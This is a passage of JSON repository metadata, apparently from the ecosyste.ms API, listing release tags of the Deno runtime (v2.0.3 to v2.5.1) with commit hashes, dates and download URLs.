cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2